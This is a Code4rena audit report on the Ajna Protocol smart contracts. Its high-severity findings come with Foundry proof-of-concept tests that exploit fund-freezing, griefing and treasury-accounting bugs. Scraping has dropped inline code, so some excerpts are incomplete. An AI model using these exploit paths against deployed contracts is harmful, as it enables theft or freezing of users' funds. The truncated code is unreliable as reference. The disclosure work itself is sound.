Ajna Protocol
Findings & Analysis Report
Table of contents
- Summary
- Scope
- Severity Criteria
- [H-01] PositionManager’s
can freeze funds by removing destination index even when the move was partial - [H-02] PositionManager’s
can set wrong deposit time and permanently freeze LP funds moved - [H-03] Position NFT can be spammed with insignificant positions by anyone until rewards DoS
- [H-04] Delegation rewards are not counted toward granting fund
- [H-05] Incorrect calculation of the remaining
leads to possible underflow error - [H-06] The lender could possibly lose unclaimed rewards in case a bucket goes bankrupt
- [H-07] User can exponentially increase the value of their position through the
function - [H-08] Claiming accumulated rewards while the contract is underfunded can lead to a loss of rewards
- [H-09] User can avoid bankrupting by calling
where to index is bankrupted index - [H-10] missing
validation - [H-11] RewardsManager fails to validate
when updating exchange rates allowing rewards to be drained
- [H-01] PositionManager’s
- [M-01] It is possible to steal the unallocated part of every delegation period budget
- [M-02] Delegate rewards system is unfair to delegates with less tokens and reduces decentralization
- [M-03]
reward calculation accuracy loss - [M-04] Potential unfair distribution of Rewards due to MEV in
- [M-05] Calculating new rewards is susceptible to precision loss due to division before multiplication
- [M-06] An Optimizer Bug in
- [M-07] Calling
function andExtraordinaryFunding.voteExtraordinary
function whenblock.number
equals respective start block and whenblock.number
is bigger than respective start block can result in different available votes for same voter - [M-08] The voting thresholds in Ajna’s Extraordinary Funding Mechanism can be manipulated to execute proposals below the expected threshold
- [M-09] Adversary can prevent the creation of any extraordinary funding proposal by frontrunning
- [M-10] Unsafe casting from
in RewardsManager - [M-11]
should not allow users who didn’t vote in screening stage to vote - [M-12] Governance attack on Extraordinary Proposals
- [M-13]
Failure to comply with the EIP-4494 - [M-14]
could revert due to underflow
Low Risk and Non-Critical Issues
- 01
WHENvoteParams_.votesUsed < 0
IS FALSE INStandardFunding._fundingVote
if (sumOfTheSquareOfVotesCast > type(uint128).max) revert InsufficientVotingPower()
- 11
- Additional Low Risk and Non-Critical Issues
- Summary
- Gas Optimizations
- G-01 Use calldata instead of memory for function arguments that do not get mutated
- G-02 State variables can be cached instead of re-reading them from storage
- G-03 Refactor internal function to avoid unnecessary SLOAD
- G-04 Using storage instead of memory for structs/arrays saves gas
- G-05 Avoid emitting storage values
- G-06 Multiple accesses of a mapping/array should use a storage pointer
- G-07 Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate
- G-08 Usage of uints/ints smaller than 32 bytes (256 bits) incurs overhead
- G-09 Use
do while
loops instead offor
loops - G-10 Use assembly to perform efficient back-to-back calls
- G-11 Refactor event to avoid emitting data that is already present in transaction data
- G-12 Refactor event to avoid emitting empty data
- G-13 Sort array offchain to check duplicates in O(n) instead of O(n^2)
output with all optimizations applied
- Disclosures
About C4
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Ajna Protocol smart contract system written in Solidity. The audit took place between May 3—May 11 2023.
123 Wardens contributed reports to the Ajna Protocol:
- 0x73696d616f
- 0xRobocop
- 0xSmartContract
- 0xStalin
- 0xTheC0der
- 0xWaitress
- 0xcm
- 0xnev
- 7siech
- Audinarey
- Audit_Avengers (JP_Courses, pxng0lin, zzebra83, Aon_8, and ravikiranweb3)
- Aymen0909
- BGSecurity (anonresercher and martin)
- BPZ (Bitcoinfever244, PrasadLak, and zinc42)
- Bason
- Bauchibred
- Blckhv
- Brenzee
- DadeKuma
- Dug
- Eurovickk
- Evo
- GG_Security (georgits and halden)
- Haipls
- J4de
- Jerry0x
- Jiamin
- Jorgect
- Juntao
- K42
- Kenshin
- Koolex
- MohammedRizwan
- Rageur
- Raihan
- ReyAdmirado
- Ruhum
- SM3_SS
- Sathish9098
- Shogoki
- Shubham
- SpicyMeatball
- TS
- Tomio
- ToonVH
- UniversalCrypto (amaechieth and tettehnetworks)
- Vagner
- Walter
- aashar
- ast3ros
- aviggiano
- ayden
- azhar
- berlin-101
- btk
- bytes032
- c3phas
- circlelooper
- codeslide
- cryptostellar5
- deadrxsezzz
- descharre
- devscrooge
- dicethedev
- evmboi32
- fatherOfBlocks
- ginlee
- hals
- hunter_w3b
- hyh
- j4ld1na
- juancito
- kaveyjoe
- kenta
- kodyvim
- ktg
- kutugu
- ladboy233
- lfzkoala
- lukris02
- mrpathfindr
- mrvincere
- nadin
- naman1778
- nobody2018
- okolicodes
- patitonar
- peanuts
- petrichor
- pontifex
- rbserver
- ro1sharkm
- rvierdiiev
- sakshamguruji
- sces60107
- shealtielanz
- squeaky_cactus
- teawaterwire
- troublor
- tsvetanovv
- vakzz
- volodya
- wonjun
- xuwinnie
- yixxas
- yjrwkk
- yongskiws
This audit was judged by Picodes.
Final report assembled by liveactionllama.
The C4 analysis yielded an aggregated total of 25 unique vulnerabilities. Of these vulnerabilities, 11 received a risk rating in the category of HIGH severity and 14 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 54 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 32 reports recommending gas optimizations.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 Ajna Protocol repository, and is composed of 11 smart contracts written in the Solidity programming language and includes 1,391 lines of Solidity code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
High Risk Findings (11)
[H-01] PositionManager’s moveLiquidity
can freeze funds by removing destination index even when the move was partial
Submitted by hyh, also found by Koolex and Haipls
removes the PositionManager entry even when it is only partial removal as a result of IPool(params_.pool).moveQuoteToken(...)
I.e. it is correct to do fromPosition.lps -= vars.lpbAmountFrom
, but the resulting amount might not be zero, moveQuoteToken() are not guaranteed to clear the position as it has available liquidity constraint. In the case of partial quote funds removal positionIndex.remove(params_.fromIndex)
operation will freeze the remaining position.
Permanent fund freeze for the remaining position of LP beneficiary.
Proof of Concept
While positions[params_.tokenId][params_.fromIndex]
LP shares are correctly reduced by the amount returned by pool’s moveQuoteToken(), the position itself is unconditionally removed from the positionIndexes[params_.tokenId]
, making any remaining funds unavailable:
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
) = IPool(params_.pool).bucketInfo(params_.fromIndex);
// check that bucket hasn't gone bankrupt since memorialization
if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
// calculate the max amount of quote tokens that can be moved, given the tracked LP
vars.maxQuote = _lpToQuoteToken(
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
// remove bucket index from which liquidity is moved from tracked positions
>> if (!positionIndex.remove(params_.fromIndex)) revert RemovePositionFailed();
// update bucket set at which a position has liquidity
// slither-disable-next-line unused-return
// move quote tokens in pool
) = IPool(params_.pool).moveQuoteToken(
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
>> fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
toPosition.depositTime = vars.depositTime;
Bucket can contain a mix of quote and collateral tokens, but moveLiquidity() aims to retrieve vars.maxQuote = _lpToQuoteToken(...)
quote funds per current exchange rate:
function _lpToQuoteToken(
uint256 bucketLP_,
uint256 bucketCollateral_,
uint256 deposit_,
uint256 lenderLPBalance_,
uint256 maxQuoteToken_,
uint256 bucketPrice_
) pure returns (uint256 quoteTokenAmount_) {
uint256 rate = Buckets.getExchangeRate(bucketCollateral_, bucketLP_, deposit_, bucketPrice_);
quoteTokenAmount_ = Maths.wmul(lenderLPBalance_, rate);
if (quoteTokenAmount_ > deposit_) quoteTokenAmount_ = deposit_;
if (quoteTokenAmount_ > maxQuoteToken_) quoteTokenAmount_ = maxQuoteToken_;
There might be not enough quote deposit funds available to redeem the whole quote amount requested, which is controlled by the corresponding liquidity constraint:
uint256 scaledLpConstraint = Maths.wmul(params_.lpConstraint, exchangeRate);
if (
>> params_.depositConstraint < scaledDepositAvailable &&
params_.depositConstraint < scaledLpConstraint
) {
// depositConstraint is binding constraint
removedAmount_ = params_.depositConstraint;
>> redeemedLP_ = Maths.wdiv(removedAmount_, exchangeRate);
Recommended Mitigation Steps
As a most straightforward solution consider reverting when there is a remainder, i.e. when fromPosition.lps > dust_threshold
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
) = IPool(params_.pool).bucketInfo(params_.fromIndex);
// check that bucket hasn't gone bankrupt since memorialization
if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
// calculate the max amount of quote tokens that can be moved, given the tracked LP
vars.maxQuote = _lpToQuoteToken(
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
// remove bucket index from which liquidity is moved from tracked positions
if (!positionIndex.remove(params_.fromIndex)) revert RemovePositionFailed();
// update bucket set at which a position has liquidity
// slither-disable-next-line unused-return
// move quote tokens in pool
) = IPool(params_.pool).moveQuoteToken(
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
>> fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
toPosition.depositTime = vars.depositTime;
[H-02] PositionManager’s moveLiquidity
can set wrong deposit time and permanently freeze LP funds moved
Submitted by hyh, also found by nobody2018
set new destination index LP entry deposit time to be equal to the source index deposit time, while destination bucket might have defaulted after that time.
This is generally not correct as source bucket bankruptcy is controlled (i.e. LP shares that are moved are healthy), while the destination bucket’s bankruptcy time, being arbitrary, can be higher than source index deposit time, and in this case the funds will become inaccessible after such a move (i.e. healthy shares will be marked as defaulted due to incorrect deposit time used).
In other words the funds are moved from healthy non-default zone to an arbitrary point, which can be either healthy or not. In the latter case this constitutes a loss for an owner as toIndex
bucket bankruptcy time exceeding deposit time means that all other retrieval operations will be blocked.
Owner will permanently lose access to the LP shares whenever positions[params_.tokenId][params_.toIndex]
bucket bankruptcy time is greater than positions[params_.tokenId][params_.fromIndex].depositTime
is a common operation, while source and destination bucket bankruptcy times can be related in an arbitrary manner, and the net impact is permanent fund freeze, so this is a fund loss without material prerequisites, setting the severity to be high.
Proof of Concept
sets toPosition
deposit time to be fromPosition.depositTime
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
>> vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
) = IPool(params_.pool).bucketInfo(params_.fromIndex);
// check that bucket hasn't gone bankrupt since memorialization
if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
// calculate the max amount of quote tokens that can be moved, given the tracked LP
vars.maxQuote = _lpToQuoteToken(
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
// remove bucket index from which liquidity is moved from tracked positions
if (!positionIndex.remove(params_.fromIndex)) revert RemovePositionFailed();
// update bucket set at which a position has liquidity
// slither-disable-next-line unused-return
// move quote tokens in pool
) = IPool(params_.pool).moveQuoteToken(
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
>> toPosition.depositTime = vars.depositTime;
I.e. there is no check for params_.toIndex
bucket situation, the time is just copied.
While there is checking logic in LenderActions, which checks for toBucket
bankruptcy and sets the time accordingly:
vars.toBucketDepositTime = toBucketLender.depositTime;
if (vars.toBucketBankruptcyTime >= vars.toBucketDepositTime) {
// bucket is bankrupt and deposit was done before bankruptcy time, reset lender lp amount
toBucketLender.lps = toBucketLP_;
// set deposit time of the lender's to bucket as bucket's last bankruptcy timestamp + 1 so deposit won't get invalidated
vars.toBucketDepositTime = vars.toBucketBankruptcyTime + 1;
} else {
toBucketLender.lps += toBucketLP_;
// set deposit time to the greater of the lender's from bucket and the target bucket
toBucketLender.depositTime = Maths.max(vars.fromBucketDepositTime, vars.toBucketDepositTime);
This way, while bucket structure deposit time will be controlled and updated, PositionManager’s structure will have the deposit time copied over.
In the case when positions[params_.tokenId][params_.fromIndex].depositTime
was less than params_.toIndex
, this will freeze these LP funds as further attempts to use them will be blocked:
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
>> vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
>> vars.bankruptcyTime,
) = IPool(params_.pool).bucketInfo();
// check that bucket hasn't gone bankrupt since memorialization
>> if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
function reedemPositions(
RedeemPositionsParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) {
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
for (uint256 i = 0; i < indexesLength; ) {
index = params_.indexes[i];
Position memory position = positions[params_.tokenId][index];
if (position.depositTime == 0 || position.lps == 0) revert RemovePositionFailed();
// check that bucket didn't go bankrupt after memorialization
>> if (_bucketBankruptAfterDeposit(pool, index, position.depositTime)) revert BucketBankrupt();
function _bucketBankruptAfterDeposit(
IPool pool_,
uint256 index_,
uint256 depositTime_
) internal view returns (bool) {
(, , uint256 bankruptcyTime, , ) = pool_.bucketInfo(index_);
>> return depositTime_ <= bankruptcyTime;
Recommended Mitigation Steps
Consider using the resulting time of the destination position, for example:
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
vars.depositTime = fromPosition.depositTime;
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
- // update position deposit time to the from bucket deposit time
+ // update position deposit time with the renewed to bucket deposit time
+ (, vars.depositTime) = pool.lenderInfo(params_.toIndex, address(this));
toPosition.depositTime = vars.depositTime;
Notice, that this time value will be influenced by the other PositionManager positions in the params_.toIndex
bucket, but the surface described will be closed as it will be controlled against params_.toIndex
bucket bankruptcy time.
[H-03] Position NFT can be spammed with insignificant positions by anyone until rewards DoS
Submitted by 0xTheC0der, also found by aviggiano, ro1sharkm, DadeKuma, evmboi32, sakshamguruji, juancito, rvierdiiev, Haipls, kodyvim, SpicyMeatball, ToonVH, and azhar
The PositionManager.memorializePositions(params_) method can be called by anyone (per design, see 3rd party test cases) and allows insignificantly small (any value > 0) positions to be attached to anyone else’s positions NFT, see PoC. As a result, the positionIndexes[params_.tokenId]
storage array for an NFT with given token ID can be spammed with positions without the NFT owner’s consent.
Therefore, the PositionManager.getPositionIndexesFiltered(tokenId_) method might exceed the block gas limit when iterating the positionIndexes[tokenId_]
storage array. However, the RewardsManager.calculateRewards(…) and RewardsManager._calculateAndClaimRewards(…) methods rely on the aforementioned method to succeed in order to calculate and pay rewards.
All in all, a griefer can spam anyone’s position NFT with insignificant positions until the rewards mechanism fails for the NFT owner due to DoS (gas limit). Side note: A position NFT also cannot be burned as long as such insignificant positions are attached to it, see PositionManager.burn(…).
Proof of Concept
The following diff is based on the existing test case testMemorializePositions
in PositionManager.t.sol
and demonstrates that insignificant positions can be attached by anyone.
diff --git a/ajna-core/tests/forge/unit/PositionManager.t.sol b/ajna-core/tests/forge/unit/PositionManager.t.sol
index bf3aa40..56c85d1 100644
--- a/ajna-core/tests/forge/unit/PositionManager.t.sol
+++ b/ajna-core/tests/forge/unit/PositionManager.t.sol
@@ -122,6 +122,7 @@ contract PositionManagerERC20PoolTest is PositionManagerERC20PoolHelperContract
function testMemorializePositions() external {
address testAddress = makeAddr("testAddress");
+ address otherAddress = makeAddr("otherAddress");
uint256 mintAmount = 10000 * 1e18;
_mintQuoteAndApproveManagerTokens(testAddress, mintAmount);
@@ -134,17 +135,17 @@ contract PositionManagerERC20PoolTest is PositionManagerERC20PoolHelperContract
from: testAddress,
- amount: 3_000 * 1e18,
+ amount: 1, //3_000 * 1e18,
index: indexes[0]
from: testAddress,
- amount: 3_000 * 1e18,
+ amount: 1, //3_000 * 1e18,
index: indexes[1]
from: testAddress,
- amount: 3_000 * 1e18,
+ amount: 1, // 3_000 * 1e18,
index: indexes[2]
@@ -165,17 +166,20 @@ contract PositionManagerERC20PoolTest is PositionManagerERC20PoolHelperContract
// allow position manager to take ownership of the position
uint256[] memory amounts = new uint256[](3);
- amounts[0] = 3_000 * 1e18;
- amounts[1] = 3_000 * 1e18;
- amounts[2] = 3_000 * 1e18;
+ amounts[0] = 1; //3_000 * 1e18;
+ amounts[1] = 1; //3_000 * 1e18;
+ amounts[2] = 1; //3_000 * 1e18;
_pool.increaseLPAllowance(address(_positionManager), indexes, amounts);
// memorialize quote tokens into minted NFT
+ changePrank(otherAddress); // switch other address (not owner of NFT)
vm.expectEmit(true, true, true, true);
- emit TransferLP(testAddress, address(_positionManager), indexes, 9_000 * 1e18);
+ emit TransferLP(testAddress, address(_positionManager), indexes, 3 /*9_000 * 1e18*/);
vm.expectEmit(true, true, true, true);
emit MemorializePosition(testAddress, tokenId, indexes);
- _positionManager.memorializePositions(memorializeParams);
+ _positionManager.memorializePositions(memorializeParams); // switch back to test address (owner of NFT)
+ changePrank(testAddress);
// check memorialization success
uint256 positionAtPriceOneLP = _positionManager.getLP(tokenId, indexes[0]);
Tools Used
VS Code, Foundry
Recommended Mitigation Steps
Requiring that The PositionManager.memorializePositions(params_) can only be called by the NFT owner or anyone who has approval would help but break the 3rd party test cases.
Alternatively, one could enforce a minimum position value to make this griefing attack extremely unattractive.
[H-04] Delegation rewards are not counted toward granting fund
Submitted by Kenshin, also found by hyh, REACH, rbserver, Ruhum, Dug, 0xRobocop, and nobody2018
Each period reserves a reward for granting up to 3% (GBC: Global Budget Constraint). The GBC is split into two parts:
- 90% for proposal granting. Any proposal requesting more than 90% will revert. The total amount requested across winning proposals must not exceed this percentage.
- 10% for voters who have participated in that distribution period as an incentive.
Voters who have participated can claim their reward after the period has ended via claimDelegateReward()
. However, the claim function does not account for the claimed reward towards treasury granting. As a result, the treasury technically reserves up to 90% in each period while actually granting 100%.
Consider this example:
- The treasury has a total of
1000 AJNA
. 3% is reserved for this period, resulting in a GBC of30 AJNA
. The treasury is updated to1000 - 30 = 970 AJNA
. - 90% is for proposals (
) and 10% is for voters (3 AJNA
). - Assume all
are fully granted among winning proposals. - Assume 10 voters in total, all fully voted and have equal voting power. Each voter receives
0.3 AJNA
, totaling3 AJNA
. - The treasury has spent
27 AJNA + 3 AJNA
, leaving an actual balance of970 AJNA
. - This round has ended and the treasury updates its balance before starting a new one using this logic.
970 += (30 - 27)
. - The treasury accounts for
973 AJNA
while having only970 AJNA
in actuality.
More detailed analysis
When the current period has ended and before starting a new one, the treasury will re-account its amount in case the last period did not utilize all the reserved reward. For example, if the last period granted only 80% of the GBC among winning proposals, the remaining 10% will be re-added to the treasury.
File: ajna-grants/src/grants/base/StandardFunding.sol
197: function _updateTreasury(
198: uint24 distributionId_
199: ) private {
200: bytes32 fundedSlateHash = _distributions[distributionId_].fundedSlateHash;
201: uint256 fundsAvailable = _distributions[distributionId_].fundsAvailable;
203: uint256[] memory fundingProposalIds = _fundedProposalSlates[fundedSlateHash];
205: uint256 totalTokensRequested;
206: uint256 numFundedProposals = fundingProposalIds.length;
208: for (uint i = 0; i < numFundedProposals; ) {
209: Proposal memory proposal = _standardFundingProposals[fundingProposalIds[i]];
211: totalTokensRequested += proposal.tokensRequested;
213: unchecked { ++i; }
214: }
216: // readd non distributed tokens to the treasury
217: treasury += (fundsAvailable - totalTokensRequested);
In the code block above, fundsAvailable
represents 100% of the GBC and totalTokensRequested
represents up to 90% of the GBC. As a result, the treasury always adds 10% of the reserve back to its accounting.
Proof of Concept
The following PoC code is quite long because it must go through all stages. Please append and run this function in the file ajna-grants/test/unit/StandardFunding.t.sol
. The test should pass without errors.
File: ajna-grants/test/unit/StandardFunding.t.sol
1. startDistributionPeriod
2. proposeStandard
3. screeningVote
4. fundingVote
5. updateSlate
6. executeStandard
7. claimDelegateReward
function testPoCTreasuryPrecisionLoss() public {
// 14 tokenholders self delegate their tokens to enable voting on the proposals
_selfDelegateVoters(_token, _votersArr);
uint allVotersInitBalance = 50_000_000 * 1e18;
emit log_named_uint("Treasury initial amount", _grantFund.treasury());
vm.roll(_startBlock + 150);
/* =========================
1. startDistributionPeriod()
========================= */
assertEq(_token.balanceOf(address(_grantFund)), 500_000_000 * 1e18, "No token should have left the treasury");
uint24 distributionId = _grantFund.startNewDistributionPeriod();
assertEq(_grantFund.getDistributionId(), distributionId, "Should have the same ID");
uint oldTreasury = _grantFund.treasury();
emit log_named_uint("Treasury after start, deduct 3%", oldTreasury);
(, , , uint128 gbc, , ) = _grantFund.getDistributionPeriodInfo(distributionId);
assertEq(gbc, 15_000_000 * 1e18);
emit log_named_uint("GBC", uint(gbc));
assertEq(oldTreasury + gbc, 500_000_000 * 1e18, "Should be equal to the initial treasury fund");
/* =================
2. proposeStandard()
================= */
// Request 9/10 of GBC (maximal)
// 9/10 of GBC = 13_500_000 == 8_500_000 + 5_000_000 (all in WAD uint)
TestProposalParams[] memory testProposalParams = new TestProposalParams[](2);
testProposalParams[0] = TestProposalParams(address(this), 8_500_000 * 1e18);
testProposalParams[1] = TestProposalParams(address(this), 5_000_000 * 1e18);
TestProposal[] memory testProposals = _createNProposals(_grantFund, _token, testProposalParams);
assertEq(testProposals.length, 2, "Should created exact 2 proposals");
vm.roll(_startBlock + 200);
/* ===============
3. screeningVote()
=============== */
// Demonstrate only 6 voters, all fully use their vote power (50_000_000 * 1e18)
// #0 got 2 votes
// #1 got 4 votes
_screeningVote(_grantFund, _tokenHolder1, testProposals[0].proposalId, _getScreeningVotes(_grantFund, _tokenHolder1));
_screeningVote(_grantFund, _tokenHolder2, testProposals[0].proposalId, _getScreeningVotes(_grantFund, _tokenHolder2));
_screeningVote(_grantFund, _tokenHolder3, testProposals[1].proposalId, _getScreeningVotes(_grantFund, _tokenHolder3));
_screeningVote(_grantFund, _tokenHolder4, testProposals[1].proposalId, _getScreeningVotes(_grantFund, _tokenHolder4));
_screeningVote(_grantFund, _tokenHolder5, testProposals[1].proposalId, _getScreeningVotes(_grantFund, _tokenHolder5));
_screeningVote(_grantFund, _tokenHolder6, testProposals[1].proposalId, _getScreeningVotes(_grantFund, _tokenHolder6));
// /* =============
// 4. fundingVote()
// ============= */
// skip time to move from screening period to funding period
vm.roll(_startBlock + 600_000);
GrantFund.Proposal[] memory proposals = _getProposalListFromProposalIds(_grantFund, _grantFund.getTopTenProposals(distributionId));
assertEq(proposals.length, 2);
// Proposals should be sorted descending according to votes received so #1 should be the first and #0 should be the second
assertEq(proposals[0].proposalId, testProposals[1].proposalId, "Should have the correct proposalId #1");
assertEq(proposals[0].votesReceived, 200_000_000 * 1e18, "Should have the voting score of 4 voters");
assertEq(proposals[1].proposalId, testProposals[0].proposalId, "Should have the correct proposalId #0");
assertEq(proposals[1].votesReceived, 100_000_000 * 1e18, "Should have the voting score of 2 voters");
// funding period votes for two competing slates, 1, or 2 and 3
// #1 got 3 funding votes
// #0 got 3 funding votes
_fundingVote(_grantFund, _tokenHolder1, proposals[0].proposalId, voteYes, 50_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder2, proposals[1].proposalId, voteYes, 50_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder3, proposals[1].proposalId, voteYes, 50_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder4, proposals[1].proposalId, voteYes, 50_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder5, proposals[0].proposalId, voteYes, 50_000_000 * 1e18);
_fundingVote(_grantFund, _tokenHolder6, proposals[0].proposalId, voteYes, 50_000_000 * 1e18);
// Ensure that all 6 holders have fully voted.
for (uint i = 0; i < 6; i++) {
(uint128 voterPower, uint128 votingPowerRemaining, uint256 votesCast) = _grantFund.getVoterInfo(distributionId, _votersArr[i]);
assertEq(voterPower, 2_500_000_000_000_000 * 1e18, "Should have 50m^2 voting power");
assertEq(votingPowerRemaining, 0, "Should have fully voted");
// /* =============
// 5. updateSlate()
// ============= */
// skip to the end of the DistributionPeriod
vm.roll(_startBlock + 650_000);
// Updating potential Proposal Slate to include proposal that is in topTenProposal (funding Stage)
uint256[] memory slate = new uint256[](proposals.length); // length = 2
slate[0] = proposals[0].proposalId;
slate[1] = proposals[1].proposalId;
require(_grantFund.updateSlate(slate, distributionId), "Should update slate success");
(, , , , , bytes32 slateHash) = _grantFund.getDistributionPeriodInfo(distributionId);
assertTrue(slateHash != bytes32(0));
proposals = _getProposalListFromProposalIds(_grantFund, _grantFund.getFundedProposalSlate(slateHash));
// /* =================
// 6. executeStandard()
// ================= */
// skip to the end of the Distribution's challenge period
vm.roll(_startBlock + 700_000);
// execute funded proposals
assertEq(_token.balanceOf(address(this)), 0, "This contract should have 0 token amount");
_grantFund.executeStandard(testProposals[0].targets, testProposals[0].values, testProposals[0].calldatas, keccak256(bytes(testProposals[0].description)));
_grantFund.executeStandard(testProposals[1].targets, testProposals[1].values, testProposals[1].calldatas, keccak256(bytes(testProposals[1].description)));
assertEq(testProposals[0].tokensRequested + testProposals[1].tokensRequested, _token.balanceOf(address(this)), "The contract should received correct granted amount");
emit log_named_uint("totalTokensRequested", _token.balanceOf(address(this)));
assertEq(_token.balanceOf(address(this)), gbc * 9/10, "Should be equal to 90% of GBC");
proposals = _getProposalListFromProposalIds(_grantFund, _grantFund.getFundedProposalSlate(slateHash));
assertTrue(proposals[0].executed && proposals[1].executed, "Should have successfully executed");
// /* =================
// 7. claimDelegateReward()
// ================= */
// Claim delegate reward for all delegatees
// delegates who didn't vote with their full power receive fewer rewards
uint totalDelegationRewards;
for (uint i = 0; i < _votersArr.length; i++) {
uint estimatedRewards = _grantFund.getDelegateReward(distributionId, _votersArr[i]);
if (i > 5) {
// these are holders who haven't participated in this period, should have 0 reward
// _tokenHolder7 and above
uint actualRewards = _grantFund.claimDelegateReward(distributionId);
assertTrue(estimatedRewards == 0 && actualRewards == 0, "Should be ineligible for rewards");
assertFalse(_grantFund.hasClaimedReward(distributionId, _votersArr[i]), "Should unable to claim");
assertEq(_token.balanceOf(_votersArr[i]), allVotersInitBalance, "Balance should be the same as starting");
else {
// these are holders who have voted
// _tokenHolder1 - 6
uint actualRewards = _grantFund.claimDelegateReward(distributionId);
assertEq(estimatedRewards, actualRewards, "Should received the exact reward amount");
assertTrue(estimatedRewards != 0 && actualRewards != 0, "Should be eligible for rewards");
assertTrue(_grantFund.hasClaimedReward(distributionId, _votersArr[i]), "Should claim successfully");
assertEq(_token.balanceOf(_votersArr[i]), allVotersInitBalance + actualRewards, "Should have the final balance equal to init+reward");
totalDelegationRewards += actualRewards;
emit log_named_uint("Total claimed rewards", totalDelegationRewards);
assertEq(totalDelegationRewards, gbc / 10, "Should be equal to 10% of GBC");
assertEq(totalDelegationRewards + _token.balanceOf(address(this)), gbc, "10% + 90% = 100%");
assertEq(totalDelegationRewards + _token.balanceOf(address(this)) + oldTreasury, 500_000_000 * 1e18, "10% + 90% + remaining = initial treasury");
emit log_named_uint("Treasury at the end of the period (should be the same as started)", _grantFund.treasury());
// Put the treasury back to the same value as the last period to have the same GBC for easier to compare.
// Remember this equation? "10% + 90% + remaining = initial treasury"
// Current _grantFund.treasury() = remaining.
// _token.balanceOf(address(this)) = 90%
// _grantFund.startNewDistributionPeriod() -> _grantFund._updateTreasury() = 10% (because of the invalid logic)
_token.approve(address(_grantFund), _token.balanceOf(address(this)));
// only put 90% back to the treasury
// 10% + (90%&remaining) = initial treasury
assertEq(totalDelegationRewards + _grantFund.treasury(), 500_000_000 * 1e18, "Should be equal to the initial treasury");
// The function put 10% back in, while in the actual all 100% has been spent. Loss 10%.
emit log_named_uint("Treasury at the new period (got updated)", _grantFund.treasury());
assertEq(_token.balanceOf(address(_grantFund)), 498_500_000 * 1e18, "Should be initial-10%");
emit log_named_uint("treasury actual balance", _token.balanceOf(address(_grantFund)));
// The same GBC evidenced that treasury = 500_000_000 * 1e18 at the time it was calculated,
// But the actual balance is 500_000_000 * 1e18 - 10% = 498_500_000 * 1e18.
(, , , uint128 newGbc, , ) = _grantFund.getDistributionPeriodInfo(distributionId);
assertEq(oldTreasury + gbc, _grantFund.treasury() + gbc, "Should have the same GBC as previous period");
assertEq(gbc, newGbc, "Should have the same GBC as previous period");
run: forge test --match-test testPoCTreasuryPrecisionLoss -vv
